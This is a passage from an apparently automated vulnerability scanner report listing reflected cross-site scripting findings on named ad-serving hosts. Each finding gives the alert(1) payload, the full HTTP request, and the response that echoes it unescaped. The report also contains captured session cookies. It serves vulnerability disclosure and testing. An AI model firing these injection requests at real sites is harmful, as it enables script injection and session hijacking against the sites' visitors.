Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480745f6<script>alert(1)</script>fac915db6fb&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

2.8. http://480-adver-view.c3metrics.com/v.js [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload c9a94<script>alert(1)</script>2de1484b29c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adverc9a94<script>alert(1)</script>2de1484b29c&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adverc9a94<script>alert(1)</script>2de1484b29c&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

2.9. http://480-adver-view.c3metrics.com/v.js [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 8057d<script>alert(1)</script>fa805584b51 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=728057d<script>alert(1)</script>fa805584b51 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=728057d<script>alert(1)</script>fa805584b51&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

2.10. http://a.collective-media.net/adj/cm.rub_usatoday/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rub_usatoday/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19712'-alert(1)-'edff4653ce4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rub_usatoday19712'-alert(1)-'edff4653ce4/;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:03 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 15:37:03 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rub_usatoday19712'-alert(1)-'edff4653ce4/;sz=728x90;net=cm;ord=[timestamp];'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.11. http://a.collective-media.net/adj/cm.rub_usatoday/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rub_usatoday/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be6a4'-alert(1)-'d35b3f2842c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rub_usatoday/;sz=728x90;ord=[timestamp]?&be6a4'-alert(1)-'d35b3f2842c=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 09 May 2011 15:37:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 15:37:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rub_usatoday/;sz=728x90;net=cm;ord=[timestamp]?&be6a4'-alert(1)-'d35b3f2842c=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.12. http://a.collective-media.net/adj/cm.rub_usatoday/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rub_usatoday/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2af5b'-alert(1)-'737101c3cfa was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rub_usatoday/;sz=728x90;ord=[timestamp]?2af5b'-alert(1)-'737101c3cfa HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:02 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 15:37:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rub_usatoday/;sz=728x90;net=cm;ord=[timestamp]?2af5b'-alert(1)-'737101c3cfa;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.13. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cb2e"-alert(1)-"d8f71e66f7b was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=9cb2e"-alert(1)-"d8f71e66f7b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7479
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:38:51 GMT
Expires: Mon, 09 May 2011 15:38:51 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=9cb2e"-alert(1)-"d8f71e66f7bhttps://www.hyatt.com/gp/en/offers/possibilities-promo.jsp?src=agn_phd_GP_ba_google");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscripta
...[SNIP]...

2.14. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81156"-alert(1)-"869df1a9c74 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ81156"-alert(1)-"869df1a9c74&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7509

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ81156"-alert(1)-"869df1a9c74&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google");
var fscUrl = url;
...[SNIP]...

2.15. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7de38"-alert(1)-"0bf768e1cd4 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-85609413874722597de38"-alert(1)-"0bf768e1cd4&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:38:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
B4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-85609413874722597de38"-alert(1)-"0bf768e1cd4&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

2.16. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c88d7"-alert(1)-"6821c14b674 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1c88d7"-alert(1)-"6821c14b674&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
